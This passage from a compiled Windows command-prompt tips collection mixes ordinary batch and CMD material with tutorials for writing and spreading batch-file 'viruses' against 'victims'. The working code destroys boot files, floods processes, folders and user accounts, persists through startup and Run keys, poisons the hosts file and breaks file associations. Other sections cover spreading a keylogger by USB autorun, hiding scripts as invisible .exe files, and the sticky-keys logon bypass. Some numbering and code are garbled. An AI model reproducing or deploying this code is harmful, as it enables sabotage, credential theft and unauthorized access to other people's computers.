Finally, earlier versions of the Media Player (mplayer) can only play .wav, .mid, *.cda, *.avi, *.asf files. If you're trying to play .mp3 files or other audio files, this program will not work. If you need to play other media files, use an alternative command line media player that is not included with Windows. The later version of Windows wmplayer command is capable of playing .mp3 files as well as all other media files Windows Media Player is capable of playing.
Opening a sound file in a different program
To play an audio file in a different media player, set the path to the directory of where the alternative media player is or move into the directory that contains the audio file. Otherwise you'll get an error message indicating that the command is not recognized.
For example, assuming you wanted to play a MP3 file in the VLC media player. You could move into the C:\Program files\VideoLan\VLC directory or add the directory to your path. From this directory, type the below command to execute and start playing the MP3 file in VLC. Keep in mind that the mplay32 options mentioned above (/play and /close) do not work for every media player including VLC.


53. TO OPEN CMD FROM LOG ON SCREEN 

To access command prompt at logon screen (without logging in), we can easily change/clear password.  

Now press shift key five times and you must have got a dialog box "sticky keys" on screen.
Sticky keys is a feature that makes it easy for users who have physical  disablilities to press multiple keys at time.   This is the only feature which can be used before logging in at logon screen ( as per my knowledge). I repeat this feature can be used at  logon screen by pressing shift key five times.
Whenevr we start an application like paint, we are actually running mspaint.exe placed inC:\windows\system32. or command prompt, we are running cmd.exe placed in system32 directory, similary
When we press shift key 5 times or use sticky keys feature, system actually starts the executable file
sethc.exe placed in system32 directory. This means if we rename cmd.exe to sethc.exe and press shift 5 times, system would again start sethc.exe but instead of sticky keys the command prompt will be opened.
But you just cant simply rename it or change system32 files. Follow the tutorial for that.

 Tutorial :


* Go to C:\windows\system32
* Copy cmd.exe on your desktop and rename it to sethc.exe .
*Now copy that file and paste again in system32 directory.
54. Open Microsoft Word

OpenWord.bat

@echo off
REM Next command opens Microsoft Word
start /d "C:\Program Files\Microsoft Word" WINWORD.EXE

Say Hello

Hello.bat

@echo off
REM Next command inputs the greeting
echo Hello! This a sample batch file.
REM Next command displays “Press any key to continue” and waits for user to press a key
pause
dir c:\windows

55. Create a list of program files

ProgramList.bat

@echo off
REM Next command creates a list of program files in the computer’s C:\ drive
dir "C:\Program Files" > C:\list_of_program_files.txt

56. Creating Truly Powerful Batch Files

At first glance, the Windows NT® command prompt appears to be just another MS-DOS window. However, unlike other versions of Windows, Windows NT is a full-fledged operating system that doesn't ride on top of MS-DOS. Because of this, the command prompt is a powerful 32-bit application capable of interacting directly with the operating system. Virtually every Windows NT utility contains command-prompt switches. While such switches may seem archaic in the world of graphical user interfaces, they come in handy if you want to write a batch file to automate a process. In addition to the commands that run programs, Microsoft has included several extra commands in the Windows NT command interpreter that don't exist in other versions of Windows. These commands give you greater control over the operating system from your batch files. In this article, we'll show you how to take full advantage of the command line and of all its features.

57. The Power of the Question Mark
Because the whole point of this article is to show you how to build truly powerful batch files, we should show you how to figure out which commands to use. When you're writing a batch file, you may begin with an idea of what you want to accomplish but not know the exact command to use. For example, you might know that you need to back up a directory but not know how to do it via a batch file.
Figuring out the necessary command is easier than you might think. To do so, find the program that you want to use in your batch file and right-click on its icon or its listing on the Start menu. Now, choose the Properties command from the resulting shortcut menu. When the item's property sheet opens, go to the Shortcut tab and look at the name of the executable file and its location. For example, if you look at the Backup menu item, you can see that the executable file is ntbackup.exe and that it's stored at %SystemRoot%\system32, as shown in Figure A. (%SystemRoot% is just another way of expressing the location of the directory containing Windows NT.)
[image: Cc750054.batch01(en-us,TechNet.10).gif]
Figure A: Find the filename and the location of the utility you wish to automate.
Now that you know the filename and location for the utility you need to use, you can create a batch file command that calls the utility. However, adding a line to a batch file that calls the ntbackup file will merely open the Backup program. To automate tasks, you must be able to control a program from within a batch file. That's where the question mark comes in.
Go to your \%SystemRoot%\system32 directory and type ntbackup /?. A help screen will open, as shown in Figure B, listing the many command-line parameters that you can use to make ntbackup perform various tasks from the command line. This technique is great because it works with the majority of NT programs, including many third-party utilities.
[image: Cc750054.batch02(en-us,TechNet.10).gif]
Figure B: You can follow a command with the /? parameter to view the various command-line parameters.
The Extended Command Set
As we mentioned earlier, the Windows NT command prompt lets you use commands that other operating systems don't support. If you'd like to see a list of these commands, you can type cmd /? at the command prompt, as shown in Figure C. Now that you know these commands exist, we'll explain how to use them to build more powerful batch files.
[image: Cc750054.batch03(en-us,TechNet.10).gif]
Figure C: Windows NT contains many new and enhanced commands.
DEL and ERASE
In Windows NT, the DEL and ERASE commands are much more powerful than they are in other versions of MS-DOS and Windows. Although the basic syntax remains the same, Windows NT offers several switches that allow DEL to behave like the DELTREE command. Using the appropriate switches, it's also possible to delete files with specified attributes. You can even make the deletion process confirm a delete, or make the deletion process invisible. You can find out all of the details by typing del /? at the command prompt.
COLOR
Tired of that boring black and gray command prompt? You can use the COLOR command to make your batch files look more like professional programs. To do so, simply use the COLOR command followed by two hexadecimal numbers. For example, the command COLOR 17 makes the screen blue with white writing. You can choose from 16 colors, each of which can be used in the foreground or the background. To see a list of available colors and their corresponding numbers, type color /? at the command prompt.
CD and CHDIR
Windows NT contains enhanced versions of the CD and the CHDIR commands. Although both commands employ the usual syntax, two enhancements are worth mentioning. First, you can add the \D parameter to change drives as well as directories. This parameter could save you a few lines in a batch file. For example, the command:
CD /D E:\DATA 
does the same thing as the following set of commands:
E:
CD\DATA
The commands have also been modified to enable extra support for directory names that contain spaces. For example, in the past, if you wanted to change to the \My Documents directory, you had to type cd "\My Documents." With the enhanced commands, it's now possible to enter the command without the quotation marks.
MD and MKDIR
The MD and MKDIR commands have been enhanced to save you a lot of work. Now, you can create large directory structures with a single command. For example, now you can type a command such as:
MD \DATA1\DATA2\DATA3\DATA4
In the past, you had to create the DATA1, DATA2, and DATA3 directories manually before you could create the DATA4 directory. The command we just typed creates them all at once. For example, the command:
MD \DATA1\DATA2\DATA3\DATA4 
takes the place of the following lines:
CD\MD DATA1
CD DATA1
MD DATA2
CD DATA2
MD DATA3
CD DATA3
MD DATA4
CD\
PROMPT
You're probably already familiar with the PROMPT command and some of its attributes. For example, the command PROMPT $P$G displays the drive letter and the current path as the prompt. This command has become standard in recent years. However, Windows NT provides additional attributes that let you display things like the current time, the Windows NT version number, or—more importantly—the full network path. You can learn more about the PROMPT command by typing prompt /? at the command prompt.
PUSHD and POPD
The PUSHD and POPD commands work together. PUSHD captures the name of the current directory. You can also add the name of a directory that you would like to change to. For example, the command PUSHD \DATA1 will switch you to the DATA1 directory (but remember the name of the directory you're currently in). To automatically return to this directory, simply type POPD.
SET
You're probably already familiar with the SET command, which you use to assign a particular value to an environment variable. For example, the command:
SET TEMP=C:\TEMP 
would assign the value C:\TEMP to the variable TEMP. In Windows NT, the SET command has been greatly enhanced to let you perform such actions as combining strings or separating parts of a string. For example, it's now possible to take a string, strip off the first five characters, and copy the next seven characters to another variable. Although space doesn't permit us to discuss all of the intricacies of the SET command in this article, you can find out more about it by typing set /? at the command prompt.
SETLOCAL and ENDLOCAL
The SETLOCAL and ENDLOCAL commands are used together. When you use the SETLOCAL command within a batch file, any environment changes you make after that point are local to the batch file. For example, if you used the SETLOCAL command followed by the:
SET TEMP=C:\TEMP
command, the batch file would recognize the TEMP variable as containing the string C:\TEMP. However, if you were to run a different batch file or open a different MS-DOS Window, the TEMP variable wouldn't contain this string. To prevent future environment variable changes from being local, you can use the ENDLOCAL command.
IF
The IF command works similarly to the way that it does in MS-DOS or in other versions of Windows. You can still compare error levels and strings and check to see if a filename exists. The NOT parameter also still works. However, where the new and improved IF command really shines is in the added enhancements. For example, when comparing strings, you can now test to see if they're equal, not equal, less than, less than or equal to, greater than, or greater than or equal to. There's even a switch you can use to make the comparison case sensitive or case insensitive. Furthermore, IF now includes a DEFINED command that returns a TRUE value if an environment variable has already been defined. As you can see, the added capabilities of the IF command can greatly enhance your batch files. If you want to know more about the IF command, type if /? at the command prompt.
FOR
The FOR command still supports the same parameters that it always has, enabling you to test for and act on the presence of a string in a group of files. However, Windows NT contains several enhancements to this command. For example, you can now work with directories or directory trees instead of just files. You can also work with counters. For example, if you wanted to test for even numbers between 16 and 128, you could use the FOR command to do so. There are even some advanced commands for parsing files and filtering out or changing data. You can read all about these enhancements by typing for /? at the command prompt.
CALL
The CALL command allows your current batch file to pass information to and execute another batch file. The CALL command now supports several labels that you can use to pass specific information such as a drive letter, a path name, file names and extensions, and other information. You can read all about the CALL command by typing call /?at the command prompt.
SHIFT
The SHIFT command changes the position of arguments within a batch file. You can even specify the position to which you want to begin shifting the arguments. For example, typing SHIFT /2 begins shifting positions after the second argument. You can shift values in the first (%0) through ninth (%8) positions.
GOTO
If you've ever written a batch file that had several different sections that could execute depending on the value of a variable, you're probably familiar with the GOTO command. However, in the past, it's always been necessary to create a label at the bottom of the file and add a statement to each section to go to this label. Doing so prevents other sections of the file from running when they aren't supposed to. Figure D shows an example of such a file. Notice how each section of the batch file ends by calling the END section. The END section doesn't actually contain any instructions, but we still had to include it so our batch file would execute properly. However, Windows NT allows you to call a label called EOF without actually creating an EOF section. When the command interpreter reaches such a statement, it ends the batch file.
[image: Cc750054.batch04(en-us,TechNet.10).gif]
Figure D: In the past, multisection batch files had to call an END section to terminate gracefully.
START
The START command launches another application in its own window. The various switches that come with the START command let you start the program maximized or minimized. You can even control the title of the window, the program's priority, memory space, and several other aspects. Furthermore, you can control if you want the batch file to wait for the other program to terminate before continuing to run.
The START command is capable of launching more than just executable files. If a file has a registered file type, the command can open the application owning the file extension and tell the registered application to open the desired file. For example, typing start me.bmp would launch Paint and open the file Me.bmp. You can get the specific parameters of the START command by typing start /? at the command prompt.
ASSOC
The ASSOC command makes it possible to register a file extension from the command prompt. If you simply typeassoc at the command prompt, you'll see a list of file extensions and the applications they're associated with, as shown in Figure E. You can assign your own custom extension to a file type using the command:
ASSOC .EXT=FILETYPE 
where .EXT is the three-character extension and FILETYPE is the name of the application associated with the file extension.
[image: Cc750054.batch05(en-us,TechNet.10).gif]
Figure E: Typing assoc at the command prompt displays all the current file associations.

FTYPE
When we showed you how to use the ASSOC command, you might have wondered how you could force the application you associated with a file extension to launch when you START a file with that extension. That's where the FTYPE command comes into play. The FTYPE command associates a file type with an application. For example, suppose you had a custom application called MyData that had an executable file named database.exe and saved files with the ZZZ extension. You could associate and FTYPE this program using the following commands:
ASSOC .ZZZ=MyData
FTYPE MyData=DATABASE.EXE %1
Now, when you double-click on or START a file with the ZZZ extension, Windows NT will recognize it as a database file, launch database.exe, and open your file.

58. What can batch viruses do ?

They can be used to delete the windows files,format data,steal information,irritate victim, consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.

Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (I am anything you wish but extension must be bat and save it as 'all files' instead of text files).

Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.

1.  Application Bomber

@echo off // It instructs to hide the commands when batch files is executed
:x   //loop variable
start winword 
start mspaint  //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop

This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance. 

2. Folder flooder
@echo off
:x
md %random% // makes directory/folder. 
goto x

Here %random% is a variable that would generate a positive no. randomly.  So this code would make start creating folders whose name can be any random number. 


3.User account flooder 
@echo off
:x
net user %random% /add //create user account
goto x

This code would start creating windows user accounts whose names could be any random numbers. 

3.Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”  
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”    //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00  //this will shutdown the computer in 0 seconds  

Note : Files in Start up folder gets started automatically when windows starts .  You should  first two lines of  code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup


Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder. 

4. Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply 

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.  
 Lets make a batch file to 
delete this file from victim's computer and the windows will not start then.

attrib -S -R -H C:\ntldr   // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr    //delete ntldr file

After running this batch file , system will not reboot and a normal victim would definitely install the windows again. 

5. Fork Bomb

%0|%0  //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .
                   
6. Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything                          

Every extension is associated with a filetype like extension ‘exe’ is  is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.
 Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wudn’t open properly.

7.  DNS Poisoning
There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts  file.

@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts   //this command prints or add xxx.xxx.xxx.xxx. www.anything.com in hosts file. 

Replace xxx.xxx.xxx.xxx  and www.anything.com with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he wud try to log on to specific website or u can simply block any website by entering its name and any invalid IP address.

                                              Viruses we just coded
Note : Most of the batch viruses are simply undetectable by any anitiviruses
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.
   
Limitations of Batch Viruses -:
1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.

To overcome these limitations,we need to convert these batch files into executable files that is exe files.
Download this Batch To Exe coverter from here. 

After running converter ,  open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.  
               
You can  use other options as per your requirement. 

Spreading batch viruses through pen drive -:

Step 1. 
Open notepad and write 
[autorun]
open=anything.bat
Icon=anything.ico

Save file as ‘autorun.inf’
Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.


59. How to create a Batch File & batch Virus
This tutorial is about batch file programming, How to code a bit harmful virus using batch file and How to prevent against this virus. Read this amazing post and don’t forget to leave your feedback in comments.


Batch file commands :
@echo off
shutdown -r -t 100 -c “maverick”
xcopy “filename.bat” “C:Documents and SettingsAll UsersStart MenuProgramsStartup” /y
____________________________________________________________
Save it as any name with a .bat extension but with name *filename.bat*
you can change “maverick” with what ever message you want, You can also change “100“(in secs) with whatever time you want to restart.
if you changes *filename.bat* to “othername.bat” then also changes the above code to
|| xcopy “othername.bat” “C:Documents and SettingsAll UsersStart MenuProgramsStartup” /y ||
Send this file to your friends using a pendrive or by uploadig it to rapidshare/hotfile service.
 
LOGIC:-
.bat- Files having these extensions are known as batch files containg commands to be executed by command interpreter.
@echo off –  This command is used to turn off the display of executing command in command console.
-r – This parameter restarts the PC.You can also use “-s” (without quotes) to shutdown the PC.
-t :- This parameter specifies time in seconds.
-c :- This parameter is used to specify a message in the shutdown box.
xcopy:- This command copies the file specified with double quotes “othername.bat” to the location specifies (in this case startup) with double quotes “C:Documents and SettingsAll UsersStart MenuProgramsStartup”
Startup:This folder contans files to be open when ever your computer boot ups.If you place a file here it will automatically open that file on every boot.
y :- This parameter asks the command prompt to overwrite the file
After running this virus, your PC will restart and again and so on..
only way to stop this mess is to directly plug off the switch from the power board.
 
Solution:
Open your computer in safe mode and permanently delete the batch file from the startup folder.

 Here is the code for I Love You virus just copy it and paste it in your notepad!

@echo off
:a
msg * I Love You
goto a

Now after pasting it in your notepad click on ‘File’ then ‘Save as’ and give a name with extension ‘.bat‘ and run to see.

60. We will discuss about Looping in batch files and how to use them to create horrible viruses!!
I will also discuss about how to change icon and convert .bat file to.exe file.
Steps :-
1) Open notepad and copy paste any of the following codes.
<<<<<<<<<<<<<< Code -01 >>>>>>>>>>>>>>>>
@echo off
:loop
msg * write your text here
goto loop
<<<<<<<<<<<<<< Code ends >>>>>>>>>>>>>>>
<<<<<<<<<<<<<< Code -02 >>>>>>>>>>>>>>>>
@echo off
:loop
start iexplore.exe www.anywebsite.com
goto loop
<<<<<<<<<<<<<< Code Ends >>>>>>>>>>>>>>>
<<<<<<<<<<<<<< Code -03 >>>>>>>>>>>>>>>>
@echo off
:loop
msg * Enter your text here
start iexplore.exe www.anywebsite.com
goto loop
<<<<<<<<<<<<< Code Ends >>>>>>>>>>>>>>>>
<<<<<<<<<<<<<Code -04>>>>>>>>>>>>>>>>>>
@echo off
xcopy “virusname.exe” “C:Documents and SettingsAll UsersStart MenuProgramsStartup” /y 
msg * Enter your text here
start iexplore.exe www.anywebsite.com
goto loop
<<<<<<<<<<<<<Code ends>>>>>>>>>>>>>>>>>>
2) Save the File as Anyname.bat , .bat extension is compulsory.
3) Download Batch to exe converter :-
4) Open Batch to exe converter.
5) Browse Your batch file.
6) You can choose the icon of the output file by :-
6.1) Go to versioninformations
6.2) Click on “….” button, that is the browse button and browse to your icon file.
7) After that click on compile.
8) Now your .exe virus is ready, now send it your friends have Fun .
For sending methods ,Refer these posts :-
Instead of keylogger.exe, use virusname.exe at all places in above tutorial.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Logic !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
__________________
:loop
any batch command
goto loop
__________________
^ This syntax is called looping . Any command placed in place of “”any batch command“” will be executed infinite Times.
About codes:-
Code -01 : This code will execute infinite message boxes saying:
write your text here
Code-02 : This code will open a website www.anywebsite.com  infinite times in internet explorer.
Code -03 : This code will open both message and website, but execution order will be like this – first message box then web page then again message box and then again webpage, this will continue until system is restarted.
Code-04 : It is quite deadly as it will execute same as code-03 but will continue to execute even after system is restarted. Be careful while using this. The important thing you had to do is that you had to change virusname.exewith the name you are going to set to the final file.

About Commands:
msg * write your text here 
This command displays a text box containing the text which is specified after msg *  .Replace the write your text here  with whatever you want to appear in msg box.
start iexplore.exe www.anywebsite.com
^ This command will open www.anywebsite.com in internet explorer.You can change www.anywebsite.com with what ever website you want to open after execution of the virus.
xcopy:- This command copies the file specified with double quotes “virusname.exe” to the location specified (in this case startup) with double quotes “C:Documents and SettingsAll UsersStart MenuProgramsStartup” . Make sure the final file should have a name “virusname.exe” .
Startup : this folder contans files to be open when ever your computer boot ups.
if you want any file to open whenever your computer opens, just place that file in this folder and this will automatically open that file on every boot.
y :- This parameter asks the command prompt to overwrite the file






61.What is Autorun.inf and how to use it ?  Autorun.inf Virus
[image: What is Autorun.inf and how to use it ? | Autorun.inf Virus]
This tutorial is about using autorun.inf file to spread keylogger/rat via pendrive or another removable device. A detailed tutorial about autorun virus. Read this post carefully and don’t forget to leave your feedback comments in.
In windows XP it will automatically execute the instructions while in other versions of windows it will ask the user .

Q)what is autorun.inf ?
A) Autorun.inf file is a simple text file containing list of instructions to be followed by the Operating System. Whenever a CD/USB is plugged in, the system searches for this autorun file, and if found it executes all the instructions present in this file.
Q) Why it is used?
A) It is used to execute files automatically whenever a CD/Usb is plugged in. It can also change the icon of the usb/cd drive .
Steps:-
1) Creating autorun.inf :-
1.a) Open notepad and copy the followig code to it.
[autorun]
open=autorun.bat
icon=anything.ico
Here autorun.bat is the file we want to execute when our CD/USB is inserted.
Anything.ico is the name of icon file we want to set to our CD/USB drive.
2) Creating autorun.bat :-
2.a) Copy the following code [Edit it accordingly]
@echo off
start /location of the keylogger
Ex 1 :- If it is saved in a folder named rishabh which is present in the root directory of CD/USB. Then the code should be edited like this
@echo off
start rishabh/keylogger.exe
Ex 2 :- If the keylogger is placed in theroot directory then the code should be like this :-
@echo off
start keylooger.exe
2.b) Save it as autorun.bat and place it in the root directory of the CD/USB.
3) Give this CD/USB to your friends and when they will insert this in their systems, the will be infected with your keylooger.
Disabling Autorun :
1) Go to RUN and type gpedit.msc and hit ok.
2) Browse toComputer Configuration >>Administrative Templates >> Windows Components >>Autoplay Policies .
3) In details pane, double-click Turn off Autoplay.
4) Click Enabled, and then select All drives in the Turn off Autoplay box to disable Autorun on all drives.

62. DEADLY BATCH FILE HACKS AND TRICKS THAT YOU SHOULD NEVER TRY ON YOUR PC

In this tutorial I'm going to explain some deadly batch file tricks and hacks that can completely destroy your Windows Registry, You have to re-format your computer to bring it back to normal. Batch files discuessed in this post can create a real havoc on your computer, they can completely irritate you so don't try them on your PC. 

Use them on your friends or enemies computer.

1. 
2. Folder Bomber
This batch file will create 3000+  folder in less than a minute.
Open your notepad and type the following codes.
@echo off
:top
md %random%
goto top

Save it as 3000.bat
Give this file to your friend and   when he will click on that his nightmare will be started.

Above Code Explained.
@echo off makes your command prompt window blank. md %random% is the command in MS-DOS to create random folders. (md is used for creating a folder and 
%random% means folders with random names.) goto top- retures the command to :top which causes an infinite loop.

2. Fork Bomber
It is  another batch file which ulitises 100% computer resources and memory making your computer irresponsive and at last your compuer hangs. Just copy and paste 
the below codes and save it as fork.bat
:s<br />start %0<br />%0|%0<br />goto :s<br />


3. Getting Blue Screen Of Death (BOSD)
You may be surprised to know that Windows has a built-in self-crashing mechanism (no pun intended). Though it is quite easy to crash a Windows box whenever 


you doesn't want it to crash, it may be quite difficult to reproduce the scenario, when you desperately want your box crashed. So here we give you two methods to  crash your Windows box. 
Method 1: Windows Built-in Self Crasher
This method produces the 'awesome' BSOD (Blue Screen Of Death) that you are no doubt familiar with. The PC gets locked up and the only way to recover is to 
reboot it. Just follow these steps:

Run Regedit (Start -> Run -> regedit)
Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters
Create a new DWORD value with name CrashOnCtrlScroll and give it a value 1
Reboot the PC
Now whenever you want to see the cute blue screen (and crash your system), press and hold the Ctrl key on the right side of the keyboard and hit the Scroll Lock key 
twice.

3. Prank Virus
Just copy and paste the below mentioned codes and see the fun. You can edit the codes to make i more funny or even deadly.
@echo off
echo Set oWMP=CreateObject("WMplayer.OCX.7")>>123.vbs
echo Set colCDROMs=oWMP.cdromCollection>>123.vbs
echo do>>123.vbs
echo if colCDROMs.count>=1 then>>123.vbs
echo for i=0 to colCDROMs.Count -1>>123.vbs
echo colCDROMs.Item(i).Eject>>123.vbs
echo Next>>123.vbs
echo For i=0 to colCDROMs.Count -1>>123.vbs
echo colCDROMs.Item(i).Eject>>123.vbs
echo Next>>123.vbs
echo End If>>123.vbs
echo wscript.sleep 5000>>123.vbs
echo loop>>123.vbs
echo DO>>1234.vbs
echo MSGBOX "YOU ARE SCREWED!!!!!!!!!!!!",64,"ErR0r">>1234.vbs
echo LOOP>>1234.vbs
copy /y 123.vbs C:\
copy /y 1234.vbs C:\
attrib +s +h c:\123.vbs
attrib +s +h c:\1234.vbs
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoClose /t REG_DWORD /f /d 1
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticetext /f /d "YOR ARE BEEN SCREWED"
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticecaption /f /d "B0zZ_ErR0r"
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 123.vbs /d c:\123.vbs
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 1234.vbs /d c:\1234.vbs
attrib +s +h c:\123.vbs
attrib +s +h c:\1234.vbs
start 123.vbs
start 1234.vbs
echo Code Smahser owns your computer!!>>c:\almasmalik.txt
echo Code Smahser owns your computer!!>>d:\almasmalik.txt
echo Code Smahser owns your computer!!>>e:\almasmalik.txt
msg * MAY YOUR COMPUTER "REST IN PEACE"


5. Open Command Prompt Window infinite times untill your Computer Crashes
Just copy and paste the below codes to make your computer crash. (After you will restart your computer, it will be back to normal)
@echo off
:loop
start cmd.exe
goto loop
"cmd.exe" can be changed to any other program also like Calculator. For calculator use calc.exe, for My Computer use explorer.exe and so on.


63. IP & Batch File Tricks & Hacks

-Lag Computer with CMD
1. Create a new notepad file and type in the folowing code:
[bat1.bat]
@echo off
start bat2.bat
pause

[bat2.bat]
@echo off
start bat1.bat
pause

2. Go file: Save As and name it bat1.bat (make sure .bat and NOT .txt) and from the drop down menu choose 'all files'.
3. Right Click: Copy and then paste the file and rename the new file bat2.bat
3. Place those files into a folder and hide somewhere eg. C drive. Then create a shortcut of it somewhere else eg. the desktop and change the icon and name.


- Blue Screen of Death Prank
1. Create a new notepad file and type in the folowing code:
@echo off
cd /
cls
color 17
echo A problem has been detected and Windows has been shut down to prevent damage
echo to your computer.
echo.
echo The problem seems to be caused by the following file: SPCMDCON.SYS
echo.
echo PAGE_FAULT_IN_NONPAGED_AREA
echo.
echo If this is the first time you've seen this stop error screen,
echo restart your computer. If this screen appears again, follow
echo these steps:
echo.
echo Check to make sure any new hardware or software is properly installed.
echo If this is a new installation, ask your hardware or software manufacturer
echo for any Windows updates you might need.
echo.
echo If problems continue, disable or remove any newly installed hardware
echo or software. Disable BIOS memory options such as caching or shadowing.
echo If you need to use Safe Mode to remove or disable components, restart
echo your computer, press F8 to select Advanced Startup Options, and then
echo select Safe Mode.
echo.
echo Technical information:
echo.
echo *** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x0000 0000)
echo.
echo.
echo *** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c
pause :nul
cls
echo Downloading viruses . . .
ping localhost -n 5 :nul
dir /s
pause :nul

NOTE! Replace :nul with the arrow on the full stop button on the keyboard (youtube won't allow me to add that symbol in the description.)

2. Go file: save as and save it hidden somewhere eg. C:/ naming it WHATEVER.bat and choose 'all files'.
3. Create a shortcut of it on the desktop and go to properties and change the icon and file name. Also in one of the tabs find 'full screen' so it will open full screened.
4. Take a screenshot using ctrl+printscreen and paste into paint and save as an image file. Use that as a screensaver or delete all icons on the desktop and set it as the wallpaper.

 Track IP Address of someone over MSN.
1. Send a file to someone on msn or receive a file from them.
2. Go to start menu:File:Run and type CMD and in command prompt type netstat.
3. Find in the code something with 'messenger, hotmail or live' in it.
4. A few lines down or below it should be an IP address, copy that into My IP address? Free IP Address tracer and IP address lookup



- Reset IP Address in CMD
1. Open command prompt
2. Type in ipconfig /release and then hit enter
3. Type in ipconfig /renew and then hit enter


64. Enable CMD and registry editor:
1. Type the following code into notepad:
REGEDIT4
[HKEY_CURRENT_USERSoftwareMicrosoftWindo wsCurrentVersionPoliciesWinOldApp]
"Disabled"=dword:0
[HKEY_CURRENT_USERSoftwareMicrosoftWindo wsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:0 
Delete Desktop Icons:
2. Save it as unlock.reg and open it to enable cmd and reg editor.

65.  Command Prompt Tricks and Hacks

Command Prompt Tricks, Hacks, and Secrets in Windows 7, 8, Vista, and XP

The Windows Command Prompt tool, and many of its commands, might seem boring or even relatively useless at first glance, but as anyone who has ever used the Command Prompt very often can tell you, there's much to love!
Below are several Command Prompt tricks and other Command Prompt hacks that I guarantee will get you excited about many of the mundane sounding Command Prompt commands like telnet, tree, or robocopy... okay, robocopy sounds pretty cool.
Some of these Command Prompt tricks and hacks are special features or uses of the Command Prompt itself, while others are just neat or relatively unknown things you can do with certain commands. Enjoy!
1. Use Ctrl-C to Abort a Command
[image: Ctrl-C - Command Prompt Tricks]
Just about any command can be stopped in its tracks with the abort command: Ctrl-C.
If you haven't actually executed a command, you can just backspace and erase what you've typed, but if you've already executed it then you can do a Ctrl-C to stop it.
Warning: Ctrl-C isn't a magic wand and it can't undo things that aren't undoable, like a partially complete format command. However, for things like the dir command that seem to go on forever or questions you're asked at the prompt that you don't know the answer to, the abort command is an excellent Command Prompt trick to know.
2. View a Command's Results One Page (or Line) at a Time
[image: More Command - Command Prompt Tricks]
Ever run a command, like the dir command, that produces so much information on the screen that it's almost useless? You're not alone.
One way around this is to execute the command in a special way so whatever information is generated is shown to you one page, or one line, at a time.
To do this, just type the command, the dir command for example, and then follow it with the pipe redirection operator and then the more command.
For example, executing dir /s | more will generate the thousands of lines of results that you expect from the dir command, but the more command will pause each page of results with -- More -- at the bottom of the page, indicating that the command is not done running.
Just press the space bar to advance by page or press the Enter key to advance one line at a time.
See Command Prompt Trick #7 below for a different solution to this problem.
3. Run Command Prompt as an Administrator Automatically
[image: Command Prompt Admin Shortcut - Command Prompt Tricks]
Many commands require that you execute them from an elevated Command Prompt in Windows - in other words, execute them from a Command Prompt that's run as an administrator.
You can always right-click on any Command Prompt shortcut and chooseRun as administrator but creating a shortcut to do the same thing can be a huge time saver if you're a frequent Command Prompt power user.
To complete this Command Prompt trick, just create a Command Prompt shortcut on the desktop, enter the shortcut's properties and then select the Run as administrator box located in the Advanced button on theShortcut tab.
4. Become a Command Prompt Power User with Function Keys
[image: Command Prompt Function Keys - Command Prompt Tricks]
The fact that the function keys actually do something in the Command Prompt is maybe one of the best kept secrets about the tool:
F1: Pastes the last executed command (character by character)
F2: Pastes the last executed command (up to the entered character)
F3: Pastes the last executed command
F4: Deletes current prompt text up to the entered character
F5: Pastes recently executed commands (does not cycle)
F6: Pastes ^Z to the prompt
F7: Displays a selectable list of previously executed commands
F8: Pastes recently executed commands (cycles)
F9: Asks for the number of the command from the F7 list to paste
Command Prompt Trick #17 is full of arrow key shortcuts, a few of which are similar to these function key tricks.
5. Hack the Prompt Text
[image: Prompt Command - Command Prompt Tricks]
